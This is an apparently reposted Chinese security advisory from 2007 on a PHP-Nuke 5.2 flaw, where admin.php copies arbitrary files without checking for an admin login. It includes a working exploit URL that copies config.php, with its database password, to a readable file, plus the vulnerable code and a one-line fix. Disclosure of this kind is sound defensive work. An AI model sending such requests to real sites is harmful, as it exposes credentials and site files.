• 软件测试技术
  • 软件测试博客
  • 软件测试视频
  • 开源软件测试技术
  • 软件测试论坛
  • 软件测试沙龙
  • 软件测试资料下载
  • 软件测试杂志
  • 软件测试人才招聘
    暂时没有公告

字号: | 推荐给好友 上一篇 | 下一篇

PHP-Nuke安全缺陷

发布: 2007-6-08 22:43 | 作者: seanhe | 来源: 互连网

软件测试论坛讨论

领测软件测试网

    PHP-Nuke是一个开放源码软件,被很多站点用作web论坛。它的admin.php文件中存在一个安全缺陷,攻击者可以通过这个缺陷从系统硬盘的任意位置向另外的位置复制文件,从而获得一些敏感文件的访问权限,甚至将这些文件覆盖。


存在缺陷的版本


PHP-Nuke 5.2以及以前的版本


不受影响的版本


只有PHP-Nuke 5.0 RC1


Exploit


以下代码或方法只能用于研究,使用者造成的后果自负


例如:


 


http://www.example.net/admin.php?upload=1 &file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php &userfile_name=hacked.txt



然后访问刚刚建立的文件:



http://www.example.net/images/hacked.txt



就可以看到有数据库密码的config.php文件的内容。通过这种方式也可以获得其它的文件。


缺陷代码


缺陷代码在admin.php文件中:



$basedir = dirname($SCRIPT_FILENAME);
$textrows = 20;
$textcols = 85;
$udir = dirname($PHP_SELF);
if(!$wdir) $wdir="/";
if($cancel) $op="FileManager";
if($upload) {
copy($userfile,$basedir.$wdir.$userfile_name);
$lastaction = ""._UPLOADED." $userfile_name --> $wdir";
// This need a rewrite -------------------------------------> OMG! WE AGREEEEEEEE lmao
//include("header.php");
//GraphicAdmin($hlpfile);
//html_header();
//displaydir();
$wdir2="/";
chdir($basedir . $wdir2);
//CloseTable();
//include("footer.php");
Header("Location: admin.php?op=FileManager");
exit;



这段代码不检查你是否以admin的身份登录,因此你无须通过验证就可以使用admin.php文件。


解决方案


有一个临时的解决方法就是把



"if($upload) {"



改为:



"if (($upload) && ($admintest)) {"

延伸阅读

文章来源于领测软件测试网 https://www.ltesting.net/


关于领测软件测试网 | 领测软件测试网合作伙伴 | 广告服务 | 投稿指南 | 联系我们 | 网站地图 | 友情链接
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备10010545号-5
技术支持和业务联系:info@testage.com.cn 电话:010-51297073

软件测试 | 领测国际ISTQBISTQB官网TMMiTMMi认证国际软件测试工程师认证领测软件测试网